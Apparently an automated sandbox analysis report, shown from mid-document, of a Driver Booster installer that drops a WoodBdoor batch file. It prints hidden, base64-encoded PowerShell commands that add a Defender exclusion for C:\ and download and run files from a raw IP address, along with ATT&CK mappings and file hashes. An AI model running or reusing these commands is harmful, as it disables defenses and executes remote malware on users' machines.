        
        PID:2616
    - - C:\Windows\SysWOW64\netsh.exe
        
        "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name="Driver" dir=in action=Allow program="C:\Program Files (x86)\IObit\Driver Booster\AutoUpdate.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:2816
    - - C:\Program Files (x86)\IObit\Driver Booster\DriverBooster.exe
        
        "C:\Program Files (x86)\IObit\Driver Booster\DriverBooster.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:2428
      - C:\Program Files (x86)\IObit\Driver Booster\HWiNFO\HWiNFO.exe
        
        "C:\Program Files (x86)\IObit\Driver Booster\HWiNFO\HWiNFO.exe" /brandname
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1320
      - C:\Program Files (x86)\IObit\Driver Booster\Manta.exe
        
        "C:\Program Files (x86)\IObit\Driver Booster\Manta.exe" /CommStat /DoCommStat /Code="a602" /Days=0
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1508
      - C:\Program Files (x86)\IObit\Driver Booster\AutoUpdate.exe
        
        "C:\Program Files (x86)\IObit\Driver Booster\AutoUpdate.exe" /main /App=db10 /MainHwnd=0
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:2896
        
        C:\Program Files (x86)\IObit\Driver Booster\rma.exe
        
        "C:\Program Files (x86)\IObit\Driver Booster\rma.exe" /run /auto
        7⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1372
      - C:\Program Files (x86)\IObit\Driver Booster\RttHlp.exe
        
        "C:\Program Files (x86)\IObit\Driver Booster\RttHlp.exe" /cnt
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2204
      - C:\Program Files (x86)\IObit\Driver Booster\Manta.exe
        
        "C:\Program Files (x86)\IObit\Driver Booster\Manta.exe" /CommStat /DoCommStat /Code="A100" /Days=0
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2660
      - C:\Program Files (x86)\IObit\Driver Booster\Manta.exe
        
        "C:\Program Files (x86)\IObit\Driver Booster\Manta.exe" /CommStat /DoCommStat /Code="B100" /Days=7
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2652
      - C:\Program Files (x86)\IObit\Driver Booster\RttHlp.exe
        
        "C:\Program Files (x86)\IObit\Driver Booster\RttHlp.exe" /stat
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1756
      - C:\Program Files (x86)\IObit\Driver Booster\SetupHlp.exe
        
        "C:\Program Files (x86)\IObit\Driver Booster\SetupHlp.exe" /afterupgrade
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2016
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\ProgramData\WoodBdoor\main.bat" "
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2832
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ex alLSigNeD -NOl -w hIdDEn -EC QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACgAJwBDADoAXAAnACkA
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2704
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ex ALlsIgned -nOnI -W HIdDEN -eC IAAJACgAIAAuACgAJwBOAGUAdwAnACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJwAtAE8AQgBKAGUAYwBUACcAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACkAIAAoACAAWwBDAGgAQQByAF0AIAAJADEAMQAwACAACQAgAAkAKwAgAAkAWwBjAGgAYQBSAF0AIAAJADYAOQAgAAkAIAAJACsAIAAJAFsAYwBoAGEAUgBdACAACQA4ADQAIAAJACAACQArACAACQBbAEMAaABhAHIAXQAgAAkANAA2ACAACQAgAAkAKwAgAAkAWwBDAGgAYQByAF0AIAAJADgANwAgAAkAIAAJACsAIAAJAFsAYwBoAEEAcgBdACAACQAxADAAMQAgAAkAIAAJACsAIAAJAFsAYwBIAGEAcgBdACAACQA2ADYAIAAJACAACQArACAACQBbAGMASABhAHIAXQAgAAkANgA3ACAACQAgAAkAKwAgAAkAWwBDAGgAYQBSAF0AIAAJADEAMAA4ACAACQAgAAkAKwAgAAkAWwBjAEgAYQByAF0AIAAJADEAMAA1ACAACQAgAAkAKwAgAAkAWwBjAEgAQQByAF0AIAAJADEAMAAxACAACQAgAAkAKwAgAAkAWwBDAGgAYQBSAF0AIAAJADcAOAAgAAkAIAAJACsAIAAJAFsAQwBIAGEAcgBdACAACQAxADEANgAgAAkAIAApACAACQApAC4AKAAgAAkAWwBDAEgAQQBSAF0AIAAJADYAOAAgAAkAIAAJACsAIAAJAFsAQwBoAGEAUgBdACAACQAxADEAMQAgAAkAIAAJACsAIAAJAFsAYwBIAEEAUgBdACAACQA4ADcAIAAJACAACQArACAACQBbAGMAaABhAFIAXQAgAAkAMQAxADAAIAAJACAACQArACAACQBbAEMASABBAFIAXQAgAAkAMQAwADgAIAAJACAACQArACAACQBbAEMASABBAFIAXQAgAAkANwA5ACAACQAgAAkAKwAgAAkAWwBjAEgAYQByAF0AIAAJADkANwAgAAkAIAAJACsAIAAJAFsAYwBIAGEAUgBdACAACQA2ADgAIAAJACAACQArACAACQBbAEMASABBAFIAXQAgAAkAMQAwADIAIAAJACAACQArACAACQBbAEMAaABBAHIAXQAgAAkAMQAwADUAIAAJACAACQArACAACQBbAGMASABhAFIAXQAgAAkANwA2ACAACQAgAAkAKwAgAAkAWwBDAGgAYQBSAF0AIAAJADEAMAAxACAACQAgACkALgBJAG4AdgBvAGsAZQAoACAAHSBoAHQAdABwADoALwAvADEAMwA1AC4AMQA4ADEALgAxADIAMwAuADIANgAvAHMAYwBjAHAAMwAyAC4AZABsAGwAHSAgACwAIAAJAB0gJABlAE4AdgA6AGEAbABMAHUAUwBFAHIAUwBwAFIATwBGAGkAbABlAFwAcwBjAGMAcAAzADIALgBkAGwAbAAdICAAIAApACAAIAA7ACAAJgAgACAAHSAkAGUATgB2ADoAYQBsAGwAVQBzAGUAcgBTAFAAcgBvAEYASQBMAEUAXABzAGMAYwBwADMAMgAuAGQAbABsAB0g
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1136
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ex ALLSIGned -NoNI -w hIdden -eC IAAJACgAIAAuACgAJwBOAGUAJwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACcAdwAtAE8AQgBKACcAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAArACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAnAEUAQwAnACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAKwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJwBUACcAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACkAIAAJACgAIABbAEMAaABBAHIAXQAgADcAOAAgACAAKwAgAFsAYwBIAGEAcgBdACAANgA5ACAAIAArACAAWwBjAGgAQQByAF0AIAAxADEANgAgACAAKwAgAFsAQwBIAGEAcgBdACAANAA2ACAAIAArACAAWwBDAEgAYQByAF0AIAAxADEAOQAgACAAKwAgAFsAYwBIAGEAUgBdACAAMQAwADEAIAAgACsAIABbAGMAaABhAHIAXQAgADkAOAAgACAAKwAgAFsAYwBoAEEAcgBdACAAOQA5ACAAIAArACAAWwBDAEgAYQBSAF0AIAAxADAAOAAgACAAKwAgAFsAYwBIAEEAcgBdACAANwAzACAAIAArACAAWwBjAEgAQQBSAF0AIAAxADAAMQAgACAAKwAgAFsAQwBoAEEAcgBdACAAMQAxADAAIAAgACsAIABbAEMAaABBAHIAXQAgADEAMQA2ACAAIAAgACkAIAAgACkALgAoACAACQBbAGMAaABhAFIAXQAgAAkANgA4ACAACQAgAAkAKwAgAAkAWwBDAGgAQQBSAF0AIAAJADEAMQAxACAACQAgAAkAKwAgAAkAWwBjAEgAQQBSAF0AIAAJADgANwAgAAkAIAAJACsAIAAJAFsAYwBIAGEAUgBdACAACQA3ADgAIAAJACAACQArACAACQBbAEMASABhAFIAXQAgAAkANwA2ACAACQAgAAkAKwAgAAkAWwBDAGgAYQBSAF0AIAAJADEAMQAxACAACQAgAAkAKwAgAAkAWwBjAGgAYQBSAF0AIAAJADYANQAgAAkAIAAJACsAIAAJAFsAQwBIAGEAUgBdACAACQA2ADgAIAAJACAACQArACAACQBbAEMAaABhAFIAXQAgAAkAMQAwADIAIAAJACAACQArACAACQBbAEMAaABhAFIAXQAgAAkAMQAwADUAIAAJACAACQArACAACQBbAGMASABhAHIAXQAgAAkAMQAwADgAIAAJACAACQArACAACQBbAGMASABBAHIAXQAgAAkAMQAwADEAIAAJACAAKQAuAGkATgBWAG8AawBFACgAIAAJAB0gaAB0AHQAcAA6AC8ALwAxADMANQAuADEAOAAxAC4AMQAyADMALgAyADYALwByAHUAbgBkAGwAbAAzADIALgBiAGEAdAAdICAALAAgAB0gJABFAG4AVgA6AEEAbABsAHUAUwBlAHIAUwBQAFIAbwBGAGkAbABlAFwAcgB1AG4AZABsAGwAMwAyAC4AYgBhAHQAHSAgAAkAKQAgACAAOwAgAAkAJgAgACAAHSAkAEUATgBWADoAQQBsAGwAVQBzAGUAcgBTAHAAcgBvAEYAaQBsAGUAXAByAHUAbgBkAGwAbAAzADIALgBiAGEAdAAdIA==
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1916

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\IObit\Driver Booster\HWiNFO\HWiNFO32.dll

Filesize
1.2MB

MD5
e937e1a411075768ef3f287f9abc128a

SHA1
ee63928100563c1d846ecdc462a5c163ecce3d4c

SHA256
cb81c7cbd229b639f24db6655edc67f4c32954778d24e086d45a7229cc58351c

SHA512
a8a6123e1b88d3708ae76ab1ea2d3f15549d03549ee07fdf935357d06792fe63cceae7034e250588415040b8e11b0e892016bba165c488068c6c48f4cc7726a5

Download Submit
C:\Program Files (x86)\IObit\Driver Booster\Icons\Apps\is-J0JNE.tmp

Filesize
1KB

MD5
a364eb8919ad57f2278960cf6a062862

SHA1
dd7fa8dd5894960fa47e8c74e2acec034da803d3

SHA256
ac4531a4b4fe3b34054eb33f2caabe2776be0ea5fc5056670c139caffd51b4f4

SHA512
68e06dcbf244211caac4e386bc73856a7b4da97681e58de3470d6f1000abd336c2d13c84ee11e2bcda9a48afd176efc34f9567ef3bebd5577731956402ead96b

Download Submit
C:\Program Files (x86)\IObit\Driver Booster\ProductNews2.dll

Filesize
2.2MB

MD5
77835be08d6575eb0ad2e046c2f99a29

SHA1
0f615e0ff54202e172fb9ea619eae297d6c3239c

SHA256
0ae55b05a42fdf65c068b0f702740ba4a9600e081166b0b9be427cd0b28ddc53

SHA512
bf7b3f09cd7ff3c7055aeda3d4663a7bf3bf6c8ee53d84039d373af27806ba28f6ddacb5f3bbae5c106618b64ba807a6542a49e1e27736a78927ce152c94e360

Download Submit
C:\Program Files (x86)\IObit\Driver Booster\Pub

Filesize
3B

MD5
a29bdd003ef6c0c34279807341f450f2

SHA1
6b4946e00d30de81d760e19a5aeb39b57388cfbc

SHA256
352ae8779866cf74268d18978490bd4a4f4d2294ff2544ebe983f80ae8f625be

SHA512
1c88e347a1b93fa70c2f749518b1383c1750b36a6ce34b39a3bed6fb67d9bcc6521fcd8d6b1e505fbfec0d42e4e74b475744427c573f5d3b1736f988a4cd4fa0

Download Submit
C:\Program Files (x86)\IObit\Driver Booster\ScanData\scan.dat

Filesize
130B

MD5
70df5c34fd3bc550b80bb0df7811ad62

SHA1
a356d36cd50d71539d9699ac12d76fd97b8931f2

SHA256
a9c5e2c5aad2a658cf843e4ec3cc91429baf83fc89fcf0e138f6a93ea1475fd6

SHA512
7a386a9fd66383f5fc0380702e09ae18ca2487773582066cf10773ae22aa4246b260707a04674e78a43656e9bc631f007ddcd1853530eb52689e4fd9527b91db

Download Submit
C:\Program Files (x86)\IObit\Driver Booster\SysRest.dll

Filesize
109KB

MD5
f89f40f77a1f06767291db02b0f5ec90

SHA1
d03845a94156c992532636066ecc781fa7b51cf5

SHA256
f114758b34b099510877d9861a44b860de99a70671f709b4ac27f8d5d115bc9b

SHA512
9d9d07a731dfb375bab05b7df8cd460998f4ba1741e60b8309c972702e908a489a12b3caea16b787f5efdfc2bffb35e4735388ceee84344c4b75f169caf70086

Download Submit
C:\Program Files (x86)\IObit\Driver Booster\madBasic_.bpl

Filesize
210KB

MD5
4eec85a1cdd7956c538d2a9c239e0821

SHA1
46a7ae1459bebfe5dae8e05512ce8924684e97a2

SHA256
2320f3b9dfbf5fcc341eedc621deb344dd05379e258bf38c68fde021f5ffc444

SHA512
c8c1bac703cafe5713935dd97a4488be70927ad27558778386abb8525abdbb692c1bd4bd912ebb5f5a1b550f1735bdd8b06c947b713f20f14e9c4aae5e507f35

Download Submit
C:\Program Files (x86)\IObit\Driver Booster\madDisAsm_.bpl

Filesize
63KB

MD5
28077f95f05a59c719896b2b99c128c3

SHA1
139ca8c108e5cb8e47dc1bd462070aab41c1c495

SHA256
523a0533146976349231ddd9c59b0ac3bd85622031bfed06eabf7d7f779d5069

SHA512
4b2e2156efc46d89c9a48fff75ff214bd82b33ab4a1149c5598755b06a7c09f8a9432deef15e03bf6401a9a60eaac09cd9692e592fbbf090dd2c20db28fd2449

Download Submit
C:\Program Files (x86)\IObit\Driver Booster\sqlite3.dll

Filesize
906KB

MD5
a7a126f279f636b1c105f3713b558516

SHA1
e300ddd57b00a7e1e0bc793d31cb2b0096e0a5dc

SHA256
a6e09723178f3168aee3f230d1e4a112593f150a9855820a1935a1cd16e9b0bc

SHA512
420bb1cc42773ac817c748964827a6cf93f1b3ea2fe98ca86274e37816f429fd70883ea27c8e8e1c55353c1a38d5eb270f7083fda6d3a17b6f1f7010b0b3c3a8

Download Submit
C:\Program Files (x86)\IObit\Driver Booster\vcl120.bpl

Filesize
1.9MB

MD5
666e55179fc1388796355b87317f8be8

SHA1
a42473a36ae7fbbe220ed5b68db5051ec5d55e58

SHA256
10f81dc44f2c0fec5c33789cf8905b464d90d379f2e2c746458a544adc817858

SHA512
823b9323e519aa254e87218ccb54a2dbcaa0a7161db3bf59e4071597611fd5b995daaf50e9912c8c4857faa379d53706729cb566459b8ac32ce490f667a6eee5

Download Submit
C:\Program Files (x86)\IObit\Driver Booster\version.dll

Filesize
5.3MB

MD5
cc165af6a6e4978c66a86b25cf58b92b

SHA1
3767e079d784c5a2b5088de7c172da1c1bf63daf

SHA256
4e12ff9a72b7c2357f46ef645400cb6311330ced73ee787244c85ba7c57e8c8e

SHA512
29ed9563b901b818e69b17861ed55c8e0866f535ead9e1e67926ccaf587bbf00270b088111627a56795f1aff2ba9fab6c01407fa436cea81163e2db958304623

Download Submit
C:\Program Files (x86)\IObit\Driver Booster\webres.dll

Filesize
884KB

MD5
e3e9e1b72b88036576997e0d3073dc43

SHA1
ef408a7403a67a9f28cab0d76e8d23763feaea49

SHA256
d30e85e69d6eb38dd483da5d958b72654421660b2159e7371e4505174ea9d546

SHA512
5ab36f5d97c28f8b67cf68960f4b66af92a3a33c82c10304b37e80f85923072f5bea6d85bad1c3d28f4e3fc1d93751fa7c4060978ed2a87d70598108a2544e48

Download Submit
C:\Program Files (x86)\IObit\Driver Booster\zip.dll

Filesize
581KB

MD5
72788a1fb246c3240d8afc55c3c9edb3

SHA1
879f54ecfec7df093b1b8db971ef930a313c75c8

SHA256
e5fa55578595d3a2e7dfc20a0ab4aa10f880f91ff606225f91d4765b395d0fa5

SHA512
13c3c22bb82e290f165b33387f132fd0632b235caae017aadeeb6e31384fec66f4615c2f514b7c98979b682d97ae63636f8a2621ef07fbf2801d152becf50fc6

Download Submit
C:\ProgramData\WoodBdoor\main.bat

Filesize
276KB

MD5
76486a77a238f18979c948c491d402ce

SHA1
14933d50d304b4fc36f057177aebe9dbaa3a22b7

SHA256
cfca5d912f6a8eba1282d4c9230f403e5c061486dac3470225ef0ea6db608cff

SHA512
c642219feb7d0e5445f6aeac9243f8ce6285242c9adaeda94021b3c879a6cea67c60c713a93cb17aef9d208a47df00839d34dda1eda78fa0e88bd005731cc0cc

Download Submit
C:\Users\Admin\AppData\Local\Temp\HWiNFO64A_151.SYS

Filesize
61KB

MD5
b8b796586c1c177ce49dac10c57088ea

SHA1
37df4c40300da4ef18971ef4dff96c864c3e463a

SHA256
a6e75c3a21436941e9a6a111fe3a708be1753ab656ba247a40b401206096641c

SHA512
e4039f6cb66115fcd01845ccc1cf3d0cff5791f2c7b5aa32a6fe741d8317e865e608e99174ecb13d5bd1130f0b12811c8f7bfd60b0e00b869c4d84d0265ca9d5

Download Submit
C:\Users\Admin\AppData\Roaming\IObit\Driver Booster\Config.ini

Filesize
640B

MD5
9aed983e875b53f1f86da5886308a648

SHA1
37d24f241182e700ac7c993725e322948ab1cd03

SHA256
c33c20283a0095486a5d4145d7e537b57f7503e8f2554b04d0101adbfc0f71cf

SHA512
a2f4c0941d91320e012f93678761b9ff4eb684b03e00b57cec5efc37a1f69e33809400b3bc3d73d6eafbb055feb6ff564e0488d8d18be81b8739787f8ad49ecf

Download Submit
C:\Users\Admin\AppData\Roaming\IObit\Driver Booster\Config.ini

Filesize
758B

MD5
d5e8c9e9304ae5e64371b02a445af6bf

SHA1
6b041971e0212546a15b616b3dc887adca010d24

SHA256
0bfed142cb8e91cdbc2623b053df3852797c1db85906e3c0b64d10234288b7e8

SHA512
df0d3c940d6b23632e8c67cdae673094c9a8ea100d323c24987a062dcbb19fa3295cb2e843925ace77b643cb749a73289eade3db092f45575fd8599a3c0e4b96

Download Submit
C:\Users\Admin\AppData\Roaming\IObit\Driver Booster\Config.ini

Filesize
806B

MD5
c76bfd16d44cedd1d761401a0d871ce5

SHA1
142f42ed2e9eb58ed5c3917415cb845d4eed2afc

SHA256
30bc26c01b5721c603d3e23e694b6f44f12220cc2c5acfcafa0ac87b9096a121

SHA512
67936629a40b82db92902bccf0a9684b725ca9af67ab1d9839d464ecbc513eba5699da52a3c55366a2a9f9ef26b74bbd7ac9975b4551aa65a23ad8d3ce0107af

Download Submit
C:\Users\Admin\AppData\Roaming\IObit\Driver Booster\Config.ini

Filesize
894B

MD5
e16360b40d063fd47ecc85c615938f7a

SHA1
e64696552f001cbfda572c765e9c336356806d99

SHA256
911abea2a0bd8bfab44f96fd3dddd187b39af4cae0a981a27cad41f9c46be8a3

SHA512
52b5e2ad9af4b31a13b4f5672d423f9ed0a72f222a20bb8929f13aeedeba5ab623b13e528de002aaf2d5f0611bd7b888e012bf6067bc595ea9291e1417fad1df

Download Submit
C:\Users\Admin\AppData\Roaming\IObit\Driver Booster\Config.ini

Filesize
1016B

MD5
563267558bfa3b86380fa5e23161f2e2

SHA1
3a6e7c5864da2c4316a191a637d380b1ee3e356d

SHA256
a43d9ee93ba32820304885537fbf9a68d42cd096c04dc77879491e371c2938cc

SHA512
3b8dc240829253e5259695349d29e7d460e20fdacc867b727a75ad71112664decb6cb0c04b85c1b34214d3d7e7b6841a848333b5879ec125aca53c1f4a2e860d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
7e2102f7de3f6fdd900c44d520fc4a9d

SHA1
2948a7906f312082d5928044056bc3b980dd583d

SHA256
ea5c5001dd1d4e0485758d5f09c64c40a9e77c0de1baa305bfc6b7a2b8ab01ec

SHA512
75b9280be3076ee8bc7fc5f93c9495dda9bb0d3d7aed95443b982b1a694213f2df57adf60e6ca5d5f942d740b79dfa6ccecbb6a3a7eb67c31126d09e21fefe5c

Download Submit
\Program Files (x86)\IObit\Driver Booster\DataState.dll

Filesize
76KB

MD5
58a6585063cefdf0056bbe916f99bca7

SHA1
59c297cf44dc16f4b8db062438aaa6326756e215

SHA256
9f5415b13694a5030af53673844b62ffdb3246d213946edc2f491b8b81fdca35

SHA512
7bee78f10e563a44975dfe3dd59e54954feb2edded32502d6d4fdec0fd7e6125939af2ea67bb54884aafb963a244aac923059e9646ef2f0b526cc6056cfb2505

Download Submit
\Program Files (x86)\IObit\Driver Booster\DriverBooster.exe

Filesize
8.5MB

MD5
4ca43174dd3a2b2a094e92f206de0113

SHA1
bc41829b4b9e1e0705e5f33f10866cf64abbf6df

SHA256
2d5890715b088454329fff78ce75aeae530083f6a1a12ba101a91deda66b7d68

SHA512
824f317a8144de66b4f9c07d6bcbd5919b035214f5bf2e2407f0180f2b04b270617de6b1fd5df2110bf67c30da906a822d22eb1f8d32a2763ce038373d5c2e47

Download Submit
\Program Files (x86)\IObit\Driver Booster\HWiNFO\HWiNFO.exe

Filesize
172KB

MD5
31942fc22a38dcf41a331fe66113b6b6

SHA1
6cc1ee3ab64ef3bb78359fb7e39e4013f17c3a24

SHA256
5cf6f5c1e232070a8a84c3a6eecaff5631d530ac8836ba86f6f61aeefc1a4fb7

SHA512
2cd9a3fb9b2962744ed45aa5d2c7cdb349dd31dacb9fd8497aeed22aa3bdc84e6b83d25c190254696d9f9c0e7452023532d8bec0bd1c723e58bf97edc27f442f

Download Submit
\Program Files (x86)\IObit\Driver Booster\PowerMgr.dll

Filesize
74KB

MD5
97e4583b419b09292a71f05c2b8f9005

SHA1
68fd4b484ae97977334f64f6423feeb1d0e38d71

SHA256
89fbf0385e5a853dbc0b21a658ff426c60e95a9671499d9f6ed271ea32fdfe2b

SHA512
04b41717c4e63b9daa0a5440430e92e6aa20ad2119c5727002e818e828ce63633cb18f1f831a507788ccabc71ca98c76d052764c4712e0a568d23ae39522dca5

Download Submit
\Program Files (x86)\IObit\Driver Booster\madExcept_.bpl

Filesize
436KB

MD5
d9478c2025bc22669005ac356fb78043

SHA1
0c1d93510c6a9ef876d23d57cd2e722751905ba9

SHA256
2a4dbe3f771523d48b46878b2abed6ef75f0c2413bbba5e9b89d417bc39417ae

SHA512
fec82637a41ced07d7a626c8ec31cee49616caceca01e6bb09d440c2a1c0288afe6c64a65bb887babd220d9db478f451016b30c74035479edaa16c719bf73adf

Download Submit
\Program Files (x86)\IObit\Driver Booster\rtl120.bpl

Filesize
1.1MB

MD5
817b7f996c01ba29287da880fc0cd036

SHA1
1f19e486d44632cf923d6b48957a65e7499d024c

SHA256
4c8d6bf4eaeaf516f39b7be0f84d92fa9723f4ea98e8468538b239a660350a57

SHA512
3998d258018d4c0e4ca971cff5a3cf449f11725ddcba63af47e1a4e77f28766950658dbab35ce06fa1f85a4cf7a96d2e72825593f609090c47e31df66c95a0af

Download Submit
\Users\Admin\AppData\Local\Temp\is-1OM97.tmp\_isetup\_shfoldr.dll

Filesize
22KB

MD5
92dc6ef532fbb4a5c3201469a5b5eb63

SHA1
3e89ff837147c16b4e41c30d6c796374e0b8e62c

SHA256
9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

SHA512
9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

Download Submit
\Users\Admin\AppData\Local\Temp\is-1OM97.tmp\b2p.dll

Filesize
22KB

MD5
ab35386487b343e3e82dbd2671ff9dab

SHA1
03591d07aea3309b631a7d3a6e20a92653e199b8

SHA256
c3729545522fcff70db61046c0efd962df047d40e3b5ccd2272866540fc872b2

SHA512
b67d7384c769b2b1fdd3363fc3b47d300c2ea4d37334acfd774cf29169c0a504ba813dc3ecbda5b71a3f924110a77a363906b16a87b4b1432748557567d1cf09

Download Submit
\Users\Admin\AppData\Local\Temp\is-1OM97.tmp\botva2.dll

Filesize
37KB

MD5
67965a5957a61867d661f05ae1f4773e

SHA1
f14c0a4f154dc685bb7c65b2d804a02a0fb2360d

SHA256
450b9b0ba25bf068afbc2b23d252585a19e282939bf38326384ea9112dfd0105

SHA512
c6942818b9026dc5db2d62999d32cf99fe7289f79a28b8345af17acf9d13b2229a5e917a48ff1f6d59715bdbcb00c1625e0302abcfe10ca7e0475762e0a3f41b

Download Submit
\Users\Admin\AppData\Local\Temp\is-1OM97.tmp\iswin7logo.dll

Filesize
39KB

MD5
1ea948aad25ddd347d9b80bef6df9779

SHA1
0be971e67a6c3b1297e572d97c14f74b05dafed3

SHA256
30eb67bdd71d3a359819a72990029269672d52f597a2d1084d838caae91a6488

SHA512
f2cc5dce9754622f5a40c1ca20b4f00ac01197b8401fd4bd888bfdd296a43ca91a3ca261d0e9e01ee51591666d2852e34cee80badadcb77511b8a7ae72630545

Download Submit
\Users\Admin\AppData\Local\Temp\is-586A2.tmp\Driver.Booster.10.0.0.65.tmp

Filesize
1.2MB

MD5
790761a71cb61ac50c7d04b3da72a167

SHA1
6558d25b86327810bf34f256fdf4dd94127992e2

SHA256
8336a622b1b6469a2b2834381e4a15d39988145e1915c249be8dd359ebd28e68

SHA512
90b9d09e59c06c3b7e3c0eb45e072fcf4eeb846f8a43179ce7910ef1faa0b15c85c187a509c1b3d308b3f5b06518c17c9ce9a668a11bf22a4495f0c593a99ad3

Download Submit
\Users\Admin\AppData\Local\Temp\is-GTDFP.tmp\DriverBoosterPro.tmp

Filesize
3.2MB

MD5
0b97243c98d366de57c9eee8322818cb

SHA1
4201a82cf7e27478512fb1fc0af97adf8cfdf2d4

SHA256
19f13e32e13b81935aea971ef00163c6b10ce6f1121bd6a3a6f0e7a69ad24bdf

SHA512
